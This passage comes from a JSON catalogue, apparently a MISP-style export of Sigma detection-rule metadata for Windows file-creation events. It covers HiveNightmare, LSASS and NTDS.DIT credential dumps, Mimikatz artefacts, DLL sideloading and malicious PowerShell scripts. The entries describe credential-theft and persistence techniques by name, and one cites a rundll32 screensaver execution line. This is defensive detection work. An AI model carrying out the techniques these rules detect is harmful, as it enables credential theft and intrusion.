"logsource.product": "windows" - } - }, - { - "description": "Detects files written by the different tools that exploit HiveNightmare", - "uuid": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", - "value": "Typical HiveNightmare SAM File Export", - "meta": { - "refs": [ - "https://github.com/GossiTheDog/HiveNightmare", - "https://github.com/FireFart/hivenightmare/", - "https://github.com/WiredPulse/Invoke-HiveNightmare", - "https://twitter.com/cube0x0/status/1418920190759378944", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" - ], - "creation_date": "2021/07/23", - "filename": "file_event_win_hivenightmare_file_exports.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Files that accidentally contain these strings" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722", - "value": "NPPSpy Hacktool Usage", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", - "https://twitter.com/0gtweet/status/1465282548494487554", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" - ], - "tags": [ - "attack.credential_access" - ], - "creation_date": "2021/11/29", - "filename": "file_event_win_hktl_nppspy.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", - "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", - "value": "Potential Initial Access via DLL Search Order Hijacking", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", - "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" - ], - "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1574", - "attack.t1574.001", - "attack.defense_evasion" - ], - "creation_date": "2022/10/21", - "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "TeamViewer_Desktop.exe is create during install", - "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", - "value": "Installation of TeamViewer Desktop", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/01/28", - "filename": "file_event_win_install_teamviewer_desktop.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", - "value": "Inveigh Execution Artefacts", - "meta": { - "refs": [ - "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", - "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/10/24", - "filename": "file_event_win_inveigh_artefacts.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (\u201ciphlpapi.dll\u201d) is sideloaded\n", - "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", - "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "meta": { - "refs": [ - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/12", - "filename": "file_event_win_iphlpapi_dll_sideloading.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "value": "ISO File Created Within Temp Folders", - "meta": { - "refs": [ - "https://twitter.com/Sam0x90/status/1552011547974696960", - "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2022/07/30", - "filename": "file_event_win_iso_file_mount.yml", - "author": "@sam0x90", - "level": "high", - "falsepositive": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", - "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", - "value": "ISO or Image Mount Indicator in Recent Files", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", - "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", - "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/11", - "filename": "file_event_win_iso_file_recent.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Cases in which a user mounts an image file for legitimate reasons" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects programs on a Windows system that should not write an archive to disk", - "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "value": "Legitimate Application Dropped Archive", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/21", - "filename": "file_event_win_legitimate_app_dropping_archive.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects programs on a Windows system that should not write executables to disk", - "uuid": "f0540f7e-2db3-4432-b9e0-3965486744bc", - "value": "Legitimate Application Dropped Executable", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/21", - "filename": "file_event_win_legitimate_app_dropping_exe.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects programs on a Windows system that should not write scripts to disk", - "uuid": "7d604714-e071-49ff-8726-edeb95a70679", - "value": "Legitimate Application Dropped Script", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/21", - "filename": "file_event_win_legitimate_app_dropping_script.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", - "value": "LSASS Process Memory Dump Files", - "meta": { - "refs": [ - "https://www.google.com/search?q=procdump+lsass", - "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", - "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", - "https://github.com/helpsystems/nanodump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2021/11/15", - "filename": "file_event_win_lsass_dump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "value": "LSASS Memory Dump File Creation", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/10/22", - "filename": "file_event_win_lsass_memory_dump_file_creation.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "high", - "falsepositive": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "value": "WerFault LSASS Process Memory Dump", - "meta": { - "refs": [ - "https://github.com/helpsystems/nanodump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/06/27", - "filename": "file_event_win_lsass_werfault_dump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "A office file with macro is created from a commandline or a script", - "uuid": "b1c50487-1967-4315-a026-6491686d860e", - "value": "Dump Office Macro Files from Commandline", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", - "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2022/01/23", - "filename": "file_event_win_macro_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", - "value": "Adwind RAT / JRAT File Artifact", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2017/11/10", - "filename": "file_event_win_mal_adwind.yml", - "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Octopus Scanner Malware.", - "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", - "value": "Octopus Scanner Malware", - "meta": { - "refs": [ - "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" - ], - "tags": [ - "attack.t1195", - "attack.t1195.001" - ], - "creation_date": "2020/06/09", - "filename": "file_event_win_mal_octopus_scanner.yml", - "author": "NVISO", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", - "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", - "value": "Suspicious VHD Image Download From Browser", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", - "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], - "creation_date": "2021/10/25", - "filename": "file_event_win_mal_vhd_download.yml", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "level": "medium", - "falsepositive": [ - "Legitimate user creation" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz", - "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29", - "value": "Mimikatz Kirbi File Creation", - "meta": { - "refs": [ - "https://cobalt.io/blog/kerberoast-attack-techniques", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558" - ], - "creation_date": "2021/11/08", - "filename": "file_event_win_mimikatz_kirbi_file_creation.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Mimikatz MemSSP default log file creation", - "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66", - "value": "Mimikatz MemSSP Default Log File Creation", - "meta": { - "refs": [ - "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimimaktz_memssp_log_file.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2021/12/20", - "filename": "file_event_win_mimimaktz_memssp_log_file.yml", - "author": "David ANDRE", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "value": "Moriya Rootkit", - "meta": { - "refs": [ - "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2021/05/06", - "filename": "file_event_win_moriya_rootkit.yml", - "author": "Bhabesh Raj", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects msdt.exe creating files in suspicious directories", - "uuid": "318557a5-150c-4c8d-b70e-a9910e199857", - "value": "MSDT.exe Creates Files in Autorun Directory", - "meta": { - "refs": [ - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", - "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" - ], - "creation_date": "2022/08/24", - "filename": "file_event_win_msdt_autorun.yml", - "author": "Vadim Varganov, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context", - "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "value": "NET CLR Binary Execution Usage Log Artifact", - "meta": { - "refs": [ - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/11/18", - "filename": "file_event_win_net_cli_artefact.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "uuid": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "value": "Creation Suspicious File In Uncommon AppData Folder", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2022/08/05", - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "An attacker may execute an application as a .SCR File (Screensaver) using rundll32.exe desk.cpl,InstallScreenSaver", - "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", - "value": "SCR File Write Event", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Desk/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml" - ], - "tags": [ - "attack.t1218.011", - "attack.defense_evasion" - ], - "creation_date": "2022/04/27", - "filename": "file_event_win_new_src_file.yml", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "The installation of new screen savers." - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", - "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "value": "Persistence Via Notepad++ Plugins", - "meta": { - "refs": [ - "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/06/10", - "filename": "file_event_win_notepad_plus_plus_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Possible FPs during first installation of Notepad++", - "Legitimate use of custom plugins to enhance notepad++ functionality by users" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious creations of a file named ntds.dit, e.g. by a PowerShell parent or in a suspicious directory or a suspicious one liner", - "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", - "value": "Suspicious NTDS.DIT Creation", - "meta": { - "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://pentestlab.blog/tag/ntds-dit/", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2022/03/11", - "filename": "file_event_win_ntds_dit.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", - "uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "value": "Suspicious NTDS Exfil Filename Patterns", - "meta": { - "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", - "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2022/03/11", - "filename": "file_event_win_ntds_exfil_tools.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects add-ins that load when Microsoft Word or Excel starts (.wll/.xll are simply .dll fit for Word or Excel).", - "uuid": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", - "value": "Microsoft Office Add-In Loading", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], - "creation_date": "2020/05/11", - "filename": "file_event_win_office_persistence.yml", - "author": "NVISO", - "level": "high", - "falsepositive": [ - "Legitimate add-ins" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a macro file for Outlook.\nGoes with win_outlook_c2_registry_key. VbaProject.OTM is explicitly mentioned in T1137.\nParticularly interesting if both events Registry & File Creation happens at the same time.\n", - "uuid": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", - "value": "Outlook C2 Macro Creation", - "meta": { - "refs": [ - "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_c2_macro_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" - ], - "creation_date": "2021/04/05", - "filename": "file_event_win_outlook_c2_macro_creation.yml", - "author": "@ScoubiMtl", - "level": "medium", - "falsepositive": [ - "User genuinly creates a VB Macro for their email" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of new Outlook form which can contain malicious code", - "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", - "value": "Outlook Form Installation", - "meta": { - "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_newform.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.003" - ], - "creation_date": "2021/06/10", - "filename": "file_event_win_outlook_newform.yml", - "author": "Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes creating temp files related to PCRE.NET package", - "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", - "value": "PCRE.NET Package Temp Files", - "meta": { - "refs": [ - "https://twitter.com/rbmaslen/status/1321859647091970051", - "https://twitter.com/tifkin_/status/1321916444557365248", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/10/29", - "filename": "file_event_win_pcre_net_temp_file.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "value": "Pingback Backdoor - File", - "meta": { - "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.001" - ], - "creation_date": "2021/05/05", - "filename": "file_event_win_pingback_backdoor.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of known powershell scripts for exploitation", - "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", - "value": "Malicious PowerShell Commandlet Names", - "meta": { - "refs": [ - "https://raw.githubusercontent.com/Neo23x0/sigma/f35c50049fa896dff91ff545cb199319172701e8/rules/windows/powershell/powershell_malicious_commandlets.yml", - "https://github.com/PowerShellMafia/PowerSploit", - "https://github.com/NetSPI/PowerUpSQL", - "https://github.com/CsEnox/EventViewer-UACBypass", - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://github.com/nettitude/Invoke-PowerThIEf", - "https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2018/04/07", - "filename": "file_event_win_powershell_exploit_scripts.yml", - "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Attempts to detect PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", - "value": "PowerShell Writing Startup Shortcuts", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-october-2021/", - 